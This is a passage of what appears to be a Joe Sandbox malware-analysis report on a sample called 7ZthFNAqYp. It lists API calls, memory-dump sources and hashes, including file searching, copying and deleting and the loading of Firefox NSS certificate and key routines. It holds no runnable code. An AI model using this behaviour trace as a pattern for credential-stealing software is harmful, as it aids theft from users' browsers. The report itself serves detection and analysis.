                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 009366E9
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956B54), ref: 00936706
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00936719
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956B58), ref: 0093672B
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093605A
                                                                                                                                                                                                                • Part of subcall function 00936013: FindFirstFileA.KERNEL32(?,?), ref: 00936071
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956ABC), ref: 00936092
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956AC0), ref: 009360AC
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 009360D3
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956647), ref: 009360E7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 00936104
                                                                                                                                                                                                                • Part of subcall function 00936013: PathMatchSpecA.SHLWAPI(?,?), ref: 00936131
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?), ref: 00936167
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956AD8), ref: 00936179
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 0093618C
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956ADC), ref: 0093619E
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 009361B2
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093611B
                                                                                                                                                                                                                • Part of subcall function 00936013: CopyFileA.KERNEL32(?,?,00000001), ref: 0093626B
                                                                                                                                                                                                                • Part of subcall function 00936013: DeleteFileA.KERNEL32(?), ref: 009362DF
                                                                                                                                                                                                                • Part of subcall function 00936013: FindNextFileA.KERNEL32(?,?), ref: 00936341
                                                                                                                                                                                                                • Part of subcall function 00936013: FindClose.KERNEL32(?), ref: 00936355
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                                                              • Opcode ID: e43da312260e7b6b42cc99f8939677cebdbe64f80671b1b4a0c3672bfad767e1
                                                                                                                                                                                                              • Instruction ID: 444031651154a74f88375e04514ce3b301c8049d4862403770e692eef67d8b93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e43da312260e7b6b42cc99f8939677cebdbe64f80671b1b4a0c3672bfad767e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B218E7590012CAFCB50EB60DC46AD977B8EF58304F4044E5F988A7250EEB09AD58F51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB32E08
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6CB32E1C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CB32E3B
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB32E95
                                                                                                                                                                                                                • Part of subcall function 6CB21200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CAC88A4,00000000,00000000), ref: 6CB21228
                                                                                                                                                                                                                • Part of subcall function 6CB21200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CB21238
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CAC88A4,00000000,00000000), ref: 6CB2124B
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PR_CallOnce.NSS3(6CC22AA4,6CB212D0,00000000,00000000,00000000,?,6CAC88A4,00000000,00000000), ref: 6CB2125D
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CB2126F
                                                                                                                                                                                                                • Part of subcall function 6CB21200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CB21280
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CB2128E
                                                                                                                                                                                                                • Part of subcall function 6CB21200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CB2129A
                                                                                                                                                                                                                • Part of subcall function 6CB21200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CB212A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1441289343-0
                                                                                                                                                                                                              • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                              • Instruction ID: cd91bc7410a1d3173c8a9c182a74cb9fb8a7251ae0d0c68fe34feaa5767aaca0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A210775D003E14BE700CF549D45BAA3764AFA170CF151269DD0C5B782F7B6E98482D3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6CAEACC2
                                                                                                                                                                                                                • Part of subcall function 6CAC2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CAC2F0A
                                                                                                                                                                                                                • Part of subcall function 6CAC2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAC2F1D
                                                                                                                                                                                                                • Part of subcall function 6CAC2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CAC0A1B,00000000), ref: 6CAC2AF0
                                                                                                                                                                                                                • Part of subcall function 6CAC2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC2B11
                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6CAEAD5E
                                                                                                                                                                                                                • Part of subcall function 6CB057D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CACB41E,00000000,00000000,?,00000000,?,6CACB41E,00000000,00000000,00000001,?), ref: 6CB057E0
                                                                                                                                                                                                                • Part of subcall function 6CB057D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CB05843
                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(?), ref: 6CAEAD36
                                                                                                                                                                                                                • Part of subcall function 6CAC2F50: CERT_DestroyCertificate.NSS3(?), ref: 6CAC2F65
                                                                                                                                                                                                                • Part of subcall function 6CAC2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAC2F83
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAEAD4F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 132756963-0
                                                                                                                                                                                                              • Opcode ID: a655173367fd58b5c5cdd2f887c770408d35bb35285c6dda8a556c39dc1d5a09
                                                                                                                                                                                                              • Instruction ID: b636b34acd84e979993c4974c8c5afd6916108ccb9bba246f180a28d616a7407
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a655173367fd58b5c5cdd2f887c770408d35bb35285c6dda8a556c39dc1d5a09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921EBB1D001088BEF11DF65D9455EE7BB5EF49218F094168D809B7700FB31AE99DBE2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB13C9E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB13CAE
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB13CEA
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB13D02
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                                                                                              • Opcode ID: 419aedc552cf9881c0474eea55b8bf7a446c474e788f92f7bac59a584fb589f5
                                                                                                                                                                                                              • Instruction ID: a788bf245e907e76728cf24b19749211e57bcc1ff9a14a8f2b70f329e617feb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 419aedc552cf9881c0474eea55b8bf7a446c474e788f92f7bac59a584fb589f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75118179A04254AFDB00EF29DC49E9A3778EF09368F154164ED089BB12E731ED94CBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CB1F0AD,6CB1F150,?,6CB1F150,?,?,?), ref: 6CB1ECBA
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CB1ECD1
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CB1ED02
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CB1ED5A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2957673229-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EDD4
                                                                                                                                                                                                              • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EDFD
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EE14
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,6CB39767,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EE33
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3903481028-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CB55F17,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6AC94
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CB55F17,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6ACA6
                                                                                                                                                                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6ACC0
                                                                                                                                                                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6ACDB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3989322779-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CAD1DFB
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: TlsGetValue.KERNEL32(00000000,?,6CAE00D2,00000000), ref: 6CAC95D2
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: EnterCriticalSection.KERNEL32(?,?,?,6CAE00D2,00000000), ref: 6CAC95E7
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: PR_Unlock.NSS3(?,?,?,?,6CAE00D2,00000000), ref: 6CAC9605
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6CAD1E09
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890AB
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890C9
                                                                                                                                                                                                                • Part of subcall function 6CB89090: EnterCriticalSection.KERNEL32 ref: 6CB890E5
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB89116
                                                                                                                                                                                                                • Part of subcall function 6CB89090: LeaveCriticalSection.KERNEL32 ref: 6CB8913F
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_EnterMonitor.NSS3(?,?,6CACE175), ref: 6CACE19C
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_EnterMonitor.NSS3(6CACE175), ref: 6CACE1AA
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_ExitMonitor.NSS3 ref: 6CACE208
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PL_HashTableRemove.NSS3(?), ref: 6CACE219
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CACE231
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CACE249
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_ExitMonitor.NSS3 ref: 6CACE257
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD1E37
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6CAD1E4A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD1D75
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAD1D89
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000010), ref: 6CAD1D9C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD1DB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CB55D40,00000000,?,?,6CB46AC6,6CB5639C), ref: 6CB6AC2D
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE10
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: EnterCriticalSection.KERNEL32(?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE24
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CAED079,00000000,00000001), ref: 6CB0AE5A
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE6F
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE7F
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEB1
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEC9
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CB55D40,00000000,?,?,6CB46AC6,6CB5639C), ref: 6CB6AC44
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CB55D40,00000000,?,?,6CB46AC6,6CB5639C), ref: 6CB6AC59
                                                                                                                                                                                                              • free.MOZGLUE(8CB6FF01,6CB46AC6,6CB5639C,?,?,?,?,?,?,?,?,?,6CB55D40,00000000,?,6CB5AAD4), ref: 6CB6AC62
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CAC9003,?), ref: 6CB1FD91
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(A4686CB2,?), ref: 6CB1FDA2
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CB2,?,?), ref: 6CB1FDC4
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?), ref: 6CB1FDD1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,009565B6,?,?,?), ref: 00930CAD
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00930CB4
